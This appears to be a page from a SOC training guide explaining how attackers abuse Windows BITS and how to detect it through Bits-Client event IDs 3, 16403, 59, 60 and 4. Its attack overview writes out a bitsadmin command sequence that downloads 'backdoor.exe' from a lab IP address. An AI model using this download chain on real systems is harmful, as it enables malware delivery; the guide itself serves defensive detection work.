BITS Client Event Log

Introduction

Background Intelligent Transfer Service (BITS) is a legitimate Windows service that facilitates background file transfers, such as updates. However, attackers can exploit BITS to evade defenses, download malware, or exfiltrate data stealthily. This guide provides insights into how attackers misuse BITS and how to detect such activities through event log analysis.

Attack Overview: Misusing BITS with Bitsadmin

Attackers can leverage Bitsadmin, a command-line tool, to create and manage BITS jobs for malicious purposes. Below is a step-by-step example of how it’s done:

  1. Create a BITS Job:

    bitsadmin /create letsdefend_eventlogs

    This creates a job named letsdefend_eventlogs.

  2. Add File Parameters:

    bitsadmin /addfile letsdefend_eventlogs http://172.17.79.137/backdoor.exe C:\Users\letsdefend\documents\file.exe

    • Remote URL: http://172.17.79.137/backdoor.exe

    • Local Path: C:\Users\letsdefend\documents\file.exe

  3. Resume Job:

    bitsadmin /resume letsdefend_eventlogs

    This starts downloading the file.

  4. Complete Job:

    bitsadmin /complete letsdefend_eventlogs

    Finalizes the job and closes the session.

Analyzing BITS Logs

To detect malicious BITS activities, examine Bits-Client Operational Logs: Applications and Services Logs > Microsoft > Windows > Bits-Client > Operational

Key Event IDs for Detection

Event ID 3: BITS Job Created

Logs when a BITS job is created.

Key Fields:

  • Transfer Job Name: Name of the BITS job.

  • Job ID: Unique identifier to track job-related events.

  • Job Owner: User account that created the job.

Example Log:

  • Event ID: 3

  • Job Name: letsdefend_eventlogs

  • Job ID: {1234-5678-9101}

  • Job Owner: letsdefend_user

Event ID 16403: BITS Job Parameters Defined

Logs the parameters (source and destination) for the BITS job.

Key Fields:

  • RemoteName: URL of the file to download/upload.

  • LocalName: Path to store the file locally.

Example Log:

  • RemoteName: http://172.17.79.137/backdoor.exe

  • LocalName: C:\Users\letsdefend\documents\file.exe

Event ID 59: BITS Job Started/Resumed

Indicates the start or resumption of a BITS job.

Key Fields:

  • Job ID: Identifies the job.

  • Status: Indicates whether the job is started or resumed.

Example Log:

  • Event ID: 59

  • Job ID: {1234-5678-9101}

  • Status: Job Resumed

Event ID 60: BITS Job Stopped

Logs when a BITS job is stopped.

Key Fields:

  • Status Code: Indicates job outcome (0x0 for success).

Example Log:

  • Event ID: 60

  • Status: 0x0 (Success)

Event ID 4: BITS Job Completed

Confirms the successful completion of a BITS job.

Key Fields:

  • Files Transferred: Number of files downloaded/uploaded.

Example Log:

  • Event ID: 4

  • Files Transferred: 1

Detecting Malicious BITS Activity

  1. Identify Suspicious Job Names:

    • Malicious jobs may have random or unusual names.

  2. Check Remote URLs (Event ID 16403):

    • Investigate external domains and IPs for known malicious activity.

  3. Track Job Owners:

    • Verify if the job owner is a legitimate user.

  4. Monitor File Paths:

    • Look for files stored in sensitive or non-standard locations.

  5. Correlate Event IDs:

    • Track the sequence of events to confirm the lifecycle of a BITS job:

      • Event ID 3 → Job created.

      • Event ID 16403 → Parameters defined.

      • Event ID 59 → Job started/resumed.

      • Event ID 60 → Job stopped.

      • Event ID 4 → Job completed.

Key Points

By focusing on the sequence of Event IDs 3, 16403, 59, 60, and 4, SOC analysts can identify and investigate suspicious BITS activities. These logs are crucial for detecting:

  • Data exfiltration

  • Malware delivery

  • Unauthorized file transfers

Proactively monitoring BITS logs ensures early detection of threats and enhances network security against sophisticated attack techniques.

PreviousFile/Folder MonitoringNextNetwork Connections Event Log

Last updated